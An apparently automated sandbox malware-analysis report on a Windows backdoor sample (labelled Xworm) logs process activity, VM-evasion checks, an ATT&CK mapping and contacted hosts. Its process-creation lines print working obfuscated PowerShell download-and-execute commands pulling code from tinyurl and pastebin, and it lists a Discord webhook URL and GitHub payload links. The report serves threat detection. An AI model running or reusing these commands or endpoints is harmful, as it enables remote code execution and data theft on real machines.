Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Users\user\Desktop\vF20HtY4a4.exeMemory allocated: 197C6AC0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeMemory allocated: 197E04E0000 memory reserve | memory write watchJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598328Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4922Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3747Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 775Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 762Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3244Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4388Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1142Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 660Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4530
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3476Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5236Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812Thread sleep time: -598328s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968Thread sleep count: 775 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1128Thread sleep count: 144 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968Thread sleep count: 762 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3224Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 528Thread sleep count: 3244 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 528Thread sleep count: 4388 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1088Thread sleep count: 116 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3548Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2728Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3204Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4044Thread sleep count: 1142 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4044Thread sleep count: 660 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2704Thread sleep count: 192 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3520Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3744Thread sleep count: 4530 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3000Thread sleep count: 2194 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep count: 33 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 880Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep count: 211 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2676Thread sleep count: 58 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6192Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3656Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598328Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 0000000A.00000002.3021367651.000002545A0CA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2871390762.000001FDFB7A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeQueries volume information: C:\Users\user\Desktop\vF20HtY4a4.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Spearphishing Link		111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		1
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		141
Virtualization/Sandbox Evasion		Security Account Manager141
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
File and Directory Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Timestomp		Cached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534114 Sample: vF20HtY4a4.exe Startdate: 15/10/2024 Architecture: WINDOWS Score: 92 41 pastebin.com 2->41 43 tinyurl.com 2->43 45 2 other IPs or domains 2->45 63 Suricata IDS alerts for network traffic 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for submitted file 2->67 71 2 other signatures 2->71 8 vF20HtY4a4.exe 2 2->8         started        11 forfiles.exe 1 2->11         started        13 forfiles.exe 1 2->13         started        signatures3 69 Connects to a pastebin service (likely for C&C) 41->69 process4 signatures5 73 Suspicious powershell command line found 8->73 15 powershell.exe 15 20 8->15         started        20 conhost.exe 8->20         started        22 powershell.exe 7 11->22         started        24 conhost.exe 1 11->24         started        26 powershell.exe 7 13->26         started        28 conhost.exe 1 13->28         started        process6 dnsIp7 49 raw.githubusercontent.com 185.199.108.133, 443, 49765, 49837 FASTLYUS Netherlands 15->49 51 tinyurl.com 104.17.112.233, 49761, 80 CLOUDFLARENETUS United States 15->51 53 discord.com 162.159.136.232, 443, 49841, 49865 CLOUDFLARENETUS United States 15->53 39 C:\ProgramData\...\BeginSync.lnk, MS 15->39 dropped 55 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 15->55 57 Suspicious powershell command line found 15->57 59 Tries to open files direct via NTFS file id 15->59 61 Powershell creates an autostart link 15->61 30 conhost.exe 15->30         started        32 attrib.exe 1 15->32         started        34 powershell.exe 13 22->34         started        37 powershell.exe 26->37         started        file8 signatures9 process10 dnsIp11 47 pastebin.com 104.20.3.235, 443, 49833, 49834 CLOUDFLARENETUS United States 34->47

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
vF20HtY4a4.exe34%ReversingLabsWin64.Backdoor.Xworm

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://go.micro0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
tinyurl.com
104.17.112.233
truetrue
    		unknown
    discord.com
    		162.159.136.232
    		truetrue
      		unknown
      raw.githubusercontent.com
      		185.199.108.133
      		truetrue
        		unknown
        pastebin.com
        		104.20.3.235
        		truetrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
            		unknown
            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
              		unknown
              https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSItrue
                		unknown
                https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/cr_asm_crypter.txtfalse
                  		unknown
